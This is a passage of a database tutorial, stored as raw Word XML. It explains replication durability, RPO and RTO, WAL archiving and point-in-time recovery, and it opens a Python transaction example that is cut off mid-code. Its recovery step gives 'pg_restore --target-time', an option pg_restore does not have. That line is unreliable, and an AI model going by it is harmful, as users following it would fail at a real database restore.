    <w:p w14:paraId="7DCFD3BE" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">      </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28FB0E52" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    InnoDB group commit (MySQL):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="426121A7" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">      Similar mechanism: transactions grouped → batch fsync</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2354D08C" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">      binlog_group_commit_sync_delay: wait up to N microseconds to accumulate group</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07D14C47" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F0BD6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Replication Durability — Beyond Single-Machine Guarantees</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0367E2DD" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4376EC10" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t>Single-machine durability: survives crash of one machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="444AE8FF" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t>Replication durability: survives crash (or loss) of entire machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08D9478C" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6"/>
    <w:p w14:paraId="129A6F39" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t>Scenario: machine with durable WAL still fails permanently</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49A99B5F" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  Hardware fire, disk failure with no recovery, datacenter loss</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ABA7829" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  Even fsync'd WAL is useless if the disk is gone</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EA07EE8" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E316518" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  Solution: replicate WAL to other machines before acknowledging commit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28002941" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6"/>
    <w:p w14:paraId="293B6CCB" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t>Synchronous replication (zero data loss):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67C97AD7" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  PostgreSQL synchronous_standby_names:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="377A74CE" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    Before COMMIT success: at least N replicas must acknowledge WAL flush</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FDFCF7C" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7827C147" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    synchronous_standby_names = 'ANY 1 (replica1, replica2, replica3)'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="282EBD1A" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24194F1C" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    Timeline:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79FCB5A4" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">      COMMIT → write WAL locally → send WAL to replicas</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ED157ED" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">      Replica 1 receives WAL → fsyncs → sends acknowledgment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="702708F8" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">      Primary receives acknowledgment → COMMIT success returned to client</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24900543" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="442695DC" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    If primary crashes immediately after: replica has the WAL → no data loss</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="174FED72" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7054DDB1" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  Cost: +1 network RTT on every commit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02C9C0BF" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    Same datacenter: +0.5-2ms per commit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10F4132A" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    Cross-region: +50-200ms per commit (often unacceptable)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E8FF970" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="746143F5" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  Solution: synchronous replica in same datacenter (low RTT)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5278FB06" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">            asynchronous replicas in remote regions (geographic redundancy, some data loss risk)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0642FA1D" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6"/>
    <w:p w14:paraId="5281D159" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t>Asynchronous replication (small data loss window):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5949209E" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  Primary: commits → acknowledges → sends WAL to replica in background</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65752CB5" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  If primary crashes: replica may be seconds behind</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B40F764" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  Committed transactions in that gap: lost</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="665F96C9" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C288697" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  RPO (Recovery Point Objective): how much data can be lost</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39C04C70" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    Synchronous: RPO = 0 (no data loss)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="214128A6" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    Asynchronous: RPO = replication lag at time of failure (seconds to minutes)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BC1387A" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EA087CC" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  RTO (Recovery Time Objective): how long to recover</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F867108" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    Manual failover: 5-30 minutes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33AB042B" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    Automated (Patroni, Pacemaker): 30-60 seconds</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42CBAB4E" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6"/>
    <w:p w14:paraId="1A77A655" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t>Write-ahead logging for durability in practice:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B34B9EE" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6"/>
    <w:p w14:paraId="30CDE25D" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  The complete durability stack:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6571C9D9" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59596F49" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  Application transaction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="570F1B1C" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    ↓ COMMIT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="798FE7F8" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  Database WAL (fsync to local NVMe)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20C31D64" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    ↓ WAL streaming</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="784B4863" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  Synchronous replica WAL (fsync there too)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B24ED9B" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    ↓ Async WAL streaming</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52BC4606" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  Multiple async replicas (geographic distribution)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BD7319E" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    ↓ WAL archiving</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29974148" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  S3/object storage (point-in-time recovery)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AB03A8E" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45C3136E" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  Durability levels:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67CD457D" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    Local WAL only: survives process crash, OS crash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48EFC724" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    + Synchronous replica: survives machine failure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31B79E26" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    + Multiple async replicas: survives datacenter failure (with small data loss)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C3AEB1F" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    + WAL archiving: enables point-in-time recovery (go back to any moment)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B5B03DE" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    + Geographic distribution: survives regional disaster</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DB01C03" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="482F7A0D" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  Point-in-time recovery (PITR):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="606A3231" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    Archive continuous WAL stream to S3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65146A19" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    Restore: base backup → apply WAL from S3 to any target time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B373B4A" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70EA6989" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    "Restore to exactly 3:45:22 PM before the bad migration was run"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BDF9CEF" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    pg_restore + pg_waldump/pg_restore --target-time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C9479E0" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67148CB8" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    WAL archive: append-only, immutable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A6762E9" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    Even if attacker corrupts primary database: WAL archive is untouched</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B4A45FC" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:pict w14:anchorId="6D3751A6">
          <v:rect id="_x0000_i6774" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B6B9702" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F0BD6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5. Transaction Implementation Patterns — Application-Level Correctness</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="298D05FD" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F0BD6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The Application Patterns That Preserve ACID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="222B81B8" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Understanding ACID at the database level is insufficient — applications must use transactions correctly:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A1C3C44" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t>Python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28410766" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t># Pattern 1: Basic transaction boundary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61C58FEC" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t>def transfer_funds(from_account_id: int, to_account_id: int, amount: Decimal):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="732F2F97" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    with db.transaction():  # BEGIN on enter, COMMIT on exit, ROLLBACK on exception</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7441B268" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">        # All operations within this block are atomic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1766380B" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">        from_account = db.execute(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4780C601" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">            "SELECT balance FROM accounts WHERE id = %s FOR UPDATE",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3238DD32" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">            [from_account_id]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A8A8FEB" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">        ).fetchone()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40C01286" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23936497" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
